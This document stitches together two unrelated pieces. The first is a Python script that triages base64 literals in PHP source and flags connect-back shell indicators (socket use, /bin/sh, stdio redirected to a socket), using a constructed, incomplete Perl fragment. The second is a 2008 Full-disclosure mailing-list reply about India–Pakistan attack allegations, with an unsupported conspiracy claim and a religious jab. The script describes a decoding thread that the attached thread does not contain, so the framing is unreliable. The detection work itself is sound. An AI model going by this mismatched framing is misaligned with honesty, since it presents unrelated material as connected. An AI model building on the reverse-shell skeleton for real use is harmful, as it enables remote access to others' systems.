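The thread decodes one base64 literal by hand. As an added example (not from the thread and not part of any named shell), the following Python automates that triage for an incident responder looking at recovered PHP source: it pulls out long base64-looking string literals, decodes the ones that decode cleanly (the "==" padding the reply points to is checked by the decoder), and reports which decoded blobs contain the indicators of a connect-back helper that the decoded script shows: socket setup, a shell binary, standard streams redirected onto a socket, a target taken from the command line. The PHP snippet is constructed inside the script and the encoded fragment is deliberately incomplete, so nothing here is a working program; the indicator list is an assumption to extend with local knowledge.

```python
"""Triage base64 string literals embedded in PHP source.

Added example, not from the thread.  The PHP sample and its encoded string
are constructed in build_sample(); the encoded text is a few-line fragment
that only resembles the shape of the script decoded in the thread.
"""
import base64
import binascii
import re

# Quoted literals that look like base64: a long run of the alphabet plus optional padding.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{40,}={0,2})["']""")

# Indicators a reviewer looks for in decoded content.  Assumption: tune per environment.
INDICATORS = {
    "socket_module": re.compile(rb"\buse\s+Socket\b|\bsocket\s*\(", re.I),
    "shell_binary": re.compile(rb"/bin/(?:ba)?sh\b"),
    "stdio_to_socket": re.compile(rb"open\s*\(\s*STD(?:IN|OUT|ERR)\s*,\s*['\"]>&"),
    "argv_target": re.compile(rb"\$ARGV\[\d\]"),
}


def decode_b64(text: str):
    """Return decoded bytes, or None when the literal is not valid, correctly padded base64."""
    try:
        return base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None


def triage_php(source: str) -> list:
    """Return one finding per base64-looking literal: offset, decodability, indicators hit."""
    findings = []
    for m in B64_LITERAL.finditer(source):
        literal = m.group(1)
        decoded = decode_b64(literal)
        if decoded is None:
            findings.append({"offset": m.start(1), "decoded": False, "indicators": []})
            continue
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
        findings.append({"offset": m.start(1), "decoded": True,
                         "length": len(decoded), "indicators": hits})
    return findings


def build_sample() -> str:
    """Constructed PHP snippet with one harmless literal and one encoded fragment."""
    # Constructed fragment: a few lines in the shape seen in the thread, nothing runnable.
    fragment = (b"#!/usr/bin/perl\nuse Socket;\n$target=$ARGV[0];\n"
                b"open(STDIN, \">&SOCKET\");\n# ... rest omitted ...\n")
    encoded = base64.b64encode(fragment).decode("ascii")
    return '<?php\n$greeting="hello world";\n$back_connect="%s";\n?>' % encoded


if __name__ == "__main__":
    for finding in triage_php(build_sample()):
        print(finding)
```

Decoding happens only into memory for pattern matching; the script never evaluates or writes out the decoded content, which is the right posture when the source under review is hostile.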
Re: [Full-disclosure] Indian allegations alarm Pakistan
Everyone knows that, but they are hiding it. That's what Kufr is all about!

On Mon, Dec 1, 2008 at 12:03 AM, Qazi Ahmed <[EMAIL PROTECTED]> wrote:
> do you have any proof to back your theory? how about you feed your brain for a change before drawing any conclusion
>
> India uncovers Hindu terror group that carried out bombings blamed on Islamists
>
> http://www.belfasttelegraph.co.uk/news/world-news/india-uncovers-hindu-terror-group-that-carried-out-bombings-blamed-on-islamists-14076306.html
>
> Crisis May Shift India's Political Landscape
> http://www.nytimes.com/2008/11/29/world/asia/29india.html
>
> James Matthews wrote:
>> India was attacked, the attackers came from Pakistan. I understand why Pakistan feels threatened, however why would they attack Indian sites?